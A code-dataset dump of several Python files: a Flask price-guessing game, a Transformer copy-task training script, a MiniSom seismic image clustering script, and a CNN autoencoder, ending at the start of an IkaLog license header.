\"38e82e08-ec23-4b46-ac36-3e3f903a264d\",\n \"SearchRequest\": {\n \"Keyword\": \"tv\",\n \"Pagination\": {\n \"ItemsPerPage\": 10,\n \"PageNumber\": 5\n },\n \"Filters\": {\n \"Price\": {\n \"Min\": 0,\n \"Max\": 0\n },\n \"Navigation\": \"\",\n \"IncludeMarketPlace\": \"false\",\n \"Condition\": None\n }\n }\n }\n\n response = requests.post(url, data=json.dumps(params))\n pr = json.loads(response.text)\n objet = pr['Products'][randrange(0, len(pr['Products']))]\n image = objet['MainImageUrl']\n price = round(float(objet['BestOffer']['SalePrice']), 2)\n name = objet['Name']\n session['produit'] = {'objet': objet, 'image': image, 'price': price, 'name': name}\n print(image, price, name)\n\n if request.method == 'POST':\n essaye = request.form['prix']\n print(essaye)\n if float(essaye) < session['produit']['price']:\n resultat = \"C'est plus ! essaye encore\"\n elif float(essaye) > session['produit']['price']:\n resultat = \"C'est moins ! essaye encore\"\n elif float(essaye) == session['produit']['price']:\n resultat = \"Bravo\"\n return render_template('home.html', resultat=resultat, produit=session['produit'], lastTry=essaye)\n else:\n return render_template('home.html', resultat=\"\", produit=session['produit'], lastTry=\"\")\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", debug= True)\n\n\n\n\n", "sub_path": "justprix.py", "file_name": "justprix.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 38, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 38, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "509114121", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math, copy, time\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport seaborn\nseaborn.set_context(context=\"talk\")\nfrom harvard.MultiHeadedAttention import MultiHeadedAttention\nfrom harvard.PositionwiseFeedForward import PositionwiseFeedForward\nfrom harvard.PositionalEncoding import PositionalEncoding\nfrom harvard.EncoderDecoder import EncoderDecoder\nfrom harvard.Encoder import Encoder\nfrom harvard.EncoderLayer import EncoderLayer\nfrom harvard.Decoder import Decoder\nfrom harvard.DecoderLayer import DecoderLayer\nfrom harvard.Embeddings import Embeddings\nfrom harvard.Generator import Generator\nfrom harvard.NoamOpt import NoamOpt\nfrom harvard.LabelSmoothing import LabelSmoothing\nfrom harvard.Batch import Batch\nfrom harvard.SimpleLossCompute import SimpleLossCompute\nfrom harvard.Tool import subsequent_mask\ndef make_model(src_vocab, tgt_vocab, N=6,\n d_model=512, d_ff=2048, h=8, dropout=0.1):\n \"Helper: Construct a model from hyperparameters.\"\n c = copy.deepcopy\n attn = MultiHeadedAttention(h, d_model)\n ff = PositionwiseFeedForward(d_model, d_ff, dropout)\n position = PositionalEncoding(d_model, dropout)\n model = EncoderDecoder(\n Encoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N),\n Decoder(DecoderLayer(d_model, c(attn), c(attn),\n c(ff), dropout), N),\n nn.Sequential(Embeddings(d_model, src_vocab), c(position)),\n nn.Sequential(Embeddings(d_model, tgt_vocab), c(position)),\n Generator(d_model, tgt_vocab))\n\n # This was important from their code.\n # Initialize parameters with Glorot / fan_avg.\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n return model\n\ndef run_epoch(data_iter, model, loss_compute):\n \"Standard Training and Logging Function\"\n start = time.time()\n total_tokens = 0\n total_loss = 0\n tokens = 0\n for i, batch in enumerate(data_iter):\n out = model.forward(batch.src, batch.trg,\n batch.src_mask, batch.trg_mask)\n loss = loss_compute(out, batch.trg_y, batch.ntokens)\n total_loss += loss\n total_tokens += batch.ntokens\n tokens += batch.ntokens\n if i % 50 == 1:\n elapsed = time.time() - start\n print(\"Epoch Step: %d Loss: %f Tokens per Sec: %f\" %\n (i, loss / batch.ntokens, tokens / elapsed))\n start = time.time()\n tokens = 0\n return total_loss / total_tokens\n\nglobal max_src_in_batch, max_tgt_in_batch\ndef batch_size_fn(new, count, sofar):\n \"Keep augmenting batch and calculate total number of tokens + padding.\"\n global max_src_in_batch, max_tgt_in_batch\n if count == 1:\n max_src_in_batch = 0\n max_tgt_in_batch = 0\n max_src_in_batch = max(max_src_in_batch, len(new.src))\n max_tgt_in_batch = max(max_tgt_in_batch, len(new.trg) + 2)\n src_elements = count * max_src_in_batch\n tgt_elements = count * max_tgt_in_batch\n return max(src_elements, tgt_elements)\n\n\ndef get_std_opt(model):\n return NoamOpt(model.src_embed[0].d_model, 2, 4000,\n torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\n\n# # Three settings of the lrate hyperparameters.\n# opts = [NoamOpt(512, 1, 4000, None),\n# NoamOpt(512, 1, 8000, None),\n# NoamOpt(256, 1, 4000, None)]\n# plt.plot(np.arange(1, 20000), [[opt.rate(i) for opt in opts] for i in range(1, 20000)])\n# plt.legend([\"512:4000\", \"512:8000\", \"256:4000\"])\n# None\n\n\n\n\n\n\ndef data_gen(V, batch, nbatches):\n \"Generate random data for a src-tgt copy task.\"\n for i in range(nbatches):\n data = torch.from_numpy(np.random.randint(1, V, size=(batch, 10)))\n data[:, 0] = 1\n src = Variable(data, requires_grad=False)\n tgt = Variable(data, requires_grad=False)\n yield Batch(src, tgt, 0)\n\n\n\n# Train the simple copy task.\nV = 11\ncriterion = LabelSmoothing(size=V, padding_idx=0, smoothing=0.0)\nmodel = make_model(V, V, N=2)\nmodel_opt = NoamOpt(model.src_embed[0].d_model, 1, 400,\n torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\n\nfor epoch in range(10):\n model.train()\n run_epoch(data_gen(V, 30, 20), model,\n SimpleLossCompute(model.generator, criterion, model_opt))\n model.eval()\n print(run_epoch(data_gen(V, 30, 5), model,\n SimpleLossCompute(model.generator, criterion, None)))\n\ndef greedy_decode(model, src, src_mask, max_len, start_symbol):\n memory = model.encode(src, src_mask)\n ys = torch.ones(1, 1).fill_(start_symbol).type_as(src.data)\n for i in range(max_len-1):\n out = model.decode(memory, src_mask,\n Variable(ys),\n Variable(subsequent_mask(ys.size(1))\n .type_as(src.data)))\n prob = model.generator(out[:, -1])\n _, next_word = torch.max(prob, dim = 1)\n next_word = next_word.data[0]\n ys = torch.cat([ys,\n torch.ones(1, 1).type_as(src.data).fill_(next_word)], dim=1)\n return ys\n\nmodel.eval()\nsrc = Variable(torch.LongTensor([[1,2,3,4,5,6,7,8,9,10]]) )\nsrc_mask = Variable(torch.ones(1, 1, 10) )\nprint(greedy_decode(model, src, src_mask, max_len=10, start_symbol=1))\n\n\n\n\n\n\n\n\n\n", "sub_path": "harvard/Train.py", "file_name": "Train.py", "file_ext": "py", "file_size_in_byte": 5416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "seaborn.set_context", "line_number": 9, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 28, "usage_type": "attribute"}, {"api_name": "harvard.MultiHeadedAttention.MultiHeadedAttention", "line_number": 29, "usage_type": "call"}, {"api_name": "harvard.PositionwiseFeedForward.PositionwiseFeedForward", "line_number": 30, "usage_type": "call"}, {"api_name": "harvard.PositionalEncoding.PositionalEncoding", "line_number": 31, "usage_type": "call"}, {"api_name": "harvard.EncoderDecoder.EncoderDecoder", "line_number": 32, "usage_type": "call"}, {"api_name": "harvard.Encoder.Encoder", "line_number": 33, "usage_type": "call"}, {"api_name": "harvard.EncoderLayer.EncoderLayer", "line_number": 33, "usage_type": "call"}, {"api_name": "harvard.Decoder.Decoder", "line_number": 34, "usage_type": "call"}, {"api_name": "harvard.DecoderLayer.DecoderLayer", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "harvard.Embeddings.Embeddings", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "harvard.Embeddings.Embeddings", "line_number": 37, "usage_type": "call"}, {"api_name": "harvard.Generator.Generator", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "harvard.NoamOpt.NoamOpt", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 105, "usage_type": "call"}, {"api_name": "harvard.Batch.Batch", "line_number": 106, "usage_type": "call"}, {"api_name": "harvard.LabelSmoothing.LabelSmoothing", "line_number": 112, "usage_type": "call"}, {"api_name": "harvard.NoamOpt.NoamOpt", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 115, "usage_type": "attribute"}, {"api_name": "harvard.SimpleLossCompute.SimpleLossCompute", "line_number": 120, "usage_type": "call"}, {"api_name": "harvard.SimpleLossCompute.SimpleLossCompute", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 131, "usage_type": "call"}, {"api_name": "harvard.Tool.subsequent_mask", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "1412460", "text": "from minisom import MiniSom\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\n \"TkAgg\"\n) # suggested to avoid AttributeError: 'FigureCanvasMac' object has no attribute 'renderer'\nimport matplotlib.pyplot as plt\n#%matplotlib inline # used in order to see plot in notebook\n\n\n# show seimsic image \n\n# get data to use \ndata_cube = np.load(\"/Users/anderskampenes/Documents/Dokumenter/NTNU/MASTER/code/data/raw/f3-benchmark/test_once/test1_seismic.npy\")\n# make sure it is fomrated correctly \nimg = data_cube[:,0,:].T\n#plt.imshow(img)\n#plt.show()\npixels = np.reshape(img, (img.shape[0]*img.shape[1], 1))\n\n\n# initialize a 6-by-6 SOM with a learning rate of 0.5.\nsom = MiniSom(x= 2, y = 2, input_len = 1, sigma=0.1, learning_rate=0.2)\nsom.random_weights_init(pixels)\n\n# save init weight for later visualization \nstarting_weights = som.get_weights().copy()\n\n#Then we train the SOM on 100 iterations.\nsom.train_random(pixels, 100)\n\n# quantize each pixel of the image\nqnt = som.quantization(pixels)\n\nprint(\"mlknbbkjbkjbjkbjk\")\n# building new image\nclustered = np.zeros(img.shape)\nfor i, q in enumerate(qnt):\n clustered[np.unravel_index(i, shape=(img.shape[0], img.shape[1]))] = q\n\nprint(\"done unraveling\", img.shape, clustered.shape,starting_weights.shape, som.get_weights().shape)\n\nplt.figure(figsize=(12, 6))\nplt.subplot(221)\nplt.title('Original')\nplt.imshow(img)\nplt.subplot(222)\nplt.title('Result')\nplt.imshow(clustered)\n\n\nplt.subplot(223)\nplt.title('Initial Colors')\nplt.imshow(np.squeeze(starting_weights))\nplt.subplot(224)\nplt.title('Learnt Colors')\nplt.imshow(np.squeeze(som.get_weights()))\n\nplt.tight_layout()\nplt.show()", "sub_path": "scripts/GTA/gta.py", "file_name": "gta.py", "file_ext": "py", "file_size_in_byte": 1627, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.use", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 19, "usage_type": "call"}, {"api_name": "minisom.MiniSom", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.squeeze", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "numpy.squeeze", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "610663970", "text": "import torch \nfrom torch import nn as nn\nimport numpy as np \n\n\n\n\nclass CNNEncoder(nn.Module):\n def __init__(self,\n input_width,\n input_height,\n input_channels,\n output_size,\n kernel_sizes,\n n_channels,\n strides,\n paddings,\n hidden_sizes=None,\n added_fc_input_size=0,\n batch_norm_conv=False,\n batch_norm_fc=False,\n init_w=1e-4,\n hidden_init=nn.init.xavier_uniform_,\n hidden_activation=nn.ReLU()):\n super(CNNEncoder, self).__init__()\n if hidden_sizes is None:\n self.hidden_sizes = []\n else:\n self.hidden_sizes = hidden_sizes\n assert (len(kernel_sizes) == \\\n len(n_channels) == \\\n len(strides) == \\\n len(paddings)), \"size of kernel, n_channels, strides, and paddings is not equal\"\n\n \n self.input_width = input_width\n self.input_height = input_height\n self.input_channels = input_channels\n self.output_size = output_size\n self.kernel_sizes = kernel_sizes\n self.n_channels = n_channels\n self.strides = strides\n self.paddings = paddings\n self.added_fc_input_size = added_fc_input_size\n self.batch_norm_conv = batch_norm_conv\n self.batch_norm_fc = batch_norm_fc\n self.hidden_int = hidden_init\n self.hidden_activation = hidden_activation\n\n self.conv_layers = nn.ModuleList()\n self.conv_norm_layers = nn.ModuleList()\n self.fc_layers = nn.ModuleList()\n self.fc_norm_layers = nn.ModuleList()\n\n for output_channel, kernel_size, stride, padding in zip(self.n_channels, self.kernel_sizes, self.strides, self.paddings):\n\n conv = nn.Conv2d(self.input_channels,\n output_channel,\n kernel_size,\n stride=stride,\n padding=padding)\n hidden_init(conv.weight)\n conv.bias.data.fill_(0)\n\n self.conv_layers.append(conv)\n self.input_channels = output_channel\n\n # a test matrix to compute number channels of CNN \n test_mat = torch.zeros(1, input_channels, self.input_width, self.input_height)\n \n for conv_layer in self.conv_layers:\n test_mat = conv_layer(test_mat)\n self.conv_norm_layers.append(nn.BatchNorm2d(test_mat.shape[1]))\n \n fc_input_size = int(np.prod(test_mat.shape))\n\n for idx, hidden_size in enumerate(self.hidden_sizes):\n\n fc_layer = nn.Linear(fc_input_size, hidden_size)\n fc_norm_layer = nn.BatchNorm1d(hidden_size)\n\n fc_layer.weight.data.uniform_(-init_w, init_w)\n fc_layer.bias.data.uniform_(-init_w, init_w)\n\n self.fc_layers.append(fc_layer)\n self.fc_norm_layers.append(fc_norm_layer)\n fc_input_size = hidden_size\n\n self.last_fc = nn.Linear(fc_input_size, self.output_size)\n self.last_fc.weight.data.uniform_(-init_w, init_w)\n self.last_fc.bias.data.uniform_(-init_w, init_w)\n\n def forward(self,x):\n h = self.apply_forward(x, self.conv_layers, self.conv_norm_layers,\n use_batch_norm=self.batch_norm_conv)\n\n h = h.view(h.size(0), -1)\n\n h= self.apply_forward(h, self.fc_layers, self.fc_norm_layers,\n use_batch_norm=self.batch_norm_fc)\n\n output = self.last_fc(h)\n return output\n\n def apply_forward(self,\n input,\n hidden_layers,\n norm_layers,\n use_batch_norm=False):\n h = input\n for layer, norm_layer in zip(hidden_layers, norm_layers):\n h = layer(h)\n if use_batch_norm:\n h = norm_layer(h)\n h = self.hidden_activation(h)\n return h\n\nclass DCNNDecoder(nn.Module):\n def __init__(self,\n fc_input_size,\n hidden_sizes,\n\n deconv_input_width,\n deconv_input_height,\n deconv_input_channels,\n\n deconv_output_kernel_size,\n deconv_output_strides,\n deconv_output_channels,\n\n kernel_sizes,\n strides,\n paddings,\n n_channels,\n batch_norm_deconv=False,\n batch_norm_fc=False,\n init_w=1e-3,\n hidden_init=nn.init.xavier_uniform_,\n hidden_activation=nn.ReLU()\n ):\n super(DCNNDecoder, self).__init__()\n assert (len(n_channels) == \\\n len(paddings) == \\\n len(strides) == \\\n len(kernel_sizes)), \"size of kernel, n_channels, strides, and padding is not equal\"\n\n self.hidden_sizes = hidden_sizes\n self.hidden_activation = hidden_activation\n self.deconv_input_width = deconv_input_width\n self.deconv_input_height = deconv_input_height\n self.deconv_input_channels = deconv_input_channels\n deconv_input_size = self.deconv_input_width*self.deconv_input_height*self.deconv_input_channels\n self.batch_norm_deconv = batch_norm_deconv\n self.batch_norm_fc = batch_norm_fc\n\n self.deconv_layers = nn.ModuleList()\n self.deconv_norm_layers = nn.ModuleList()\n self.fc_layers = nn.ModuleList()\n self.fc_norm_layers = nn.ModuleList()\n input_size = fc_input_size\n\n for idx, hidden_size in enumerate(self.hidden_sizes):\n\n fc_layer = nn.Linear(input_size, hidden_size)\n fc_layer.weight.data.uniform_(-init_w, init_w)\n fc_layer.bias.data.uniform_(-init_w, init_w)\n input_size = hidden_size\n self.fc_layers.append(fc_layer)\n\n fc_norm_layer = nn.BatchNorm1d(hidden_size)\n self.fc_norm_layers.append(fc_norm_layer)\n\n self.last_fc = nn.Linear(input_size, deconv_input_size)\n self.last_fc.weight.data.uniform_(-init_w, init_w)\n self.last_fc.bias.data.uniform_(-init_w, init_w)\n\n for out_channel, kernel_size, stride, padding in \\\n zip(n_channels, kernel_sizes, strides, paddings):\n deconv_layer = nn.ConvTranspose2d(deconv_input_channels,\n out_channel,\n kernel_size,\n stride=stride,\n padding=padding)\n hidden_init(deconv_layer.weight)\n deconv_layer.bias.data.fill_(0)\n\n self.deconv_layers.append(deconv_layer)\n deconv_input_channels = out_channel\n\n # a test matrix to compute number channels of CNN for BatchNorm2d\n test_mat = torch.zeros(1, self.deconv_input_channels,\n self.deconv_input_width,\n self.deconv_input_height)\n\n for deconv in self.deconv_layers:\n test_mat = deconv(test_mat)\n self.deconv_norm_layers.append(nn.BatchNorm2d(test_mat.shape[1]))\n \n self.first_deconv_output = nn.ConvTranspose2d(\n deconv_input_channels,\n deconv_output_channels,\n deconv_output_kernel_size,\n stride=deconv_output_strides,\n )\n hidden_init(self.first_deconv_output.weight)\n self.first_deconv_output.bias.data.fill_(0)\n self.sigmoid = nn.Sigmoid()\n self.relu = nn.ReLU()\n\n def forward(self, input):\n h = self.apply_forward(input,self.fc_layers,\n self.fc_norm_layers, use_batch_norm=self.batch_norm_fc)\n h = self.hidden_activation(self.last_fc(h))\n h = h.view(-1, self.deconv_input_channels, self.deconv_input_width,\n self.deconv_input_height)\n h = self.apply_forward(h, self.deconv_layers, self.deconv_norm_layers,\n use_batch_norm=self.batch_norm_deconv)\n h = self.first_deconv_output(h) \n output = self.sigmoid(h)\n # output = self.relu(h)\n return output\n\n def apply_forward(self, input, hidden_layers, norm_layers,\n use_batch_norm=False):\n h = input\n for layer, norm_layer in zip(hidden_layers, norm_layers):\n h = layer(h)\n if use_batch_norm:\n h = norm_layer(h)\n h = self.hidden_activation(h)\n return h\n\nclass Model(nn.Module):\n def __init__(self, encoder_param, decoder_param):\n super(Model, self).__init__()\n # print('encoder_param: ',encoder_param)\n self.encoder_param = encoder_param\n self.decoder_param = decoder_param\n self.encoder = CNNEncoder(\n input_width = self.encoder_param['input_width'],\n input_height = self.encoder_param['input_height'],\n input_channels = self.encoder_param['input_channels'],\n output_size = self.encoder_param['output_size'],\n kernel_sizes = self.encoder_param['kernel_sizes'],\n n_channels = self.encoder_param['n_channels'],\n strides = self.encoder_param['strides'],\n paddings = self.encoder_param['paddings'],\n hidden_sizes = self.encoder_param['hidden_sizes'],\n batch_norm_conv = self.encoder_param['batch_norm_conv'],\n batch_norm_fc = self.encoder_param['batch_norm_fc'],\n init_w = self.encoder_param['init_w'],\n hidden_init = self.encoder_param['hidden_init'],\n hidden_activation = self.encoder_param['hidden_activation']\n )\n self.decoder = DCNNDecoder(\n fc_input_size = self.decoder_param['fc_input_size'],\n hidden_sizes = self.decoder_param['hidden_sizes'],\n deconv_input_width = self.decoder_param['deconv_input_width'],\n deconv_input_height = self.decoder_param['deconv_input_height'],\n deconv_input_channels = self.decoder_param['deconv_input_channels'],\n kernel_sizes = self.decoder_param['kernel_sizes'],\n strides = self.decoder_param['strides'],\n paddings = self.decoder_param['paddings'],\n n_channels = self.decoder_param['n_channels'],\n batch_norm_deconv = self.decoder_param['batch_norm_deconv'],\n batch_norm_fc = self.decoder_param['batch_norm_fc'],\n init_w = self.decoder_param['init_w'],\n hidden_init = self.decoder_param['hidden_init'],\n hidden_activation = self.decoder_param['hidden_activation'],\n deconv_output_channels = self.decoder_param['deconv_output_channels'],\n deconv_output_kernel_size = self.decoder_param['deconv_output_kernel_size'],\n deconv_output_strides = self.decoder_param['deconv_output_strides']\n )\n def forward(self, input):\n z = self.encoder(input)\n input_reconstruction = self.decoder(z)\n return input_reconstruction, z\n", "sub_path": "vae_network.py", "file_name": "vae_network.py", "file_ext": "py", "file_size_in_byte": 10721, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.init", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "numpy.prod", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 118, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.nn.init", "line_number": 138, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 138, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 157, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 158, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 197, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 199, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 199, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 207, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 208, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 233, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 233, "usage_type": "name"}]} +{"seq_id": "73503506", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# IkaLog\n# ======\n# Copyright (C) 2016 Takeshi HASEGAWA\n# Copyright (C) 2016 Hiroyuki KOMATSU\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# 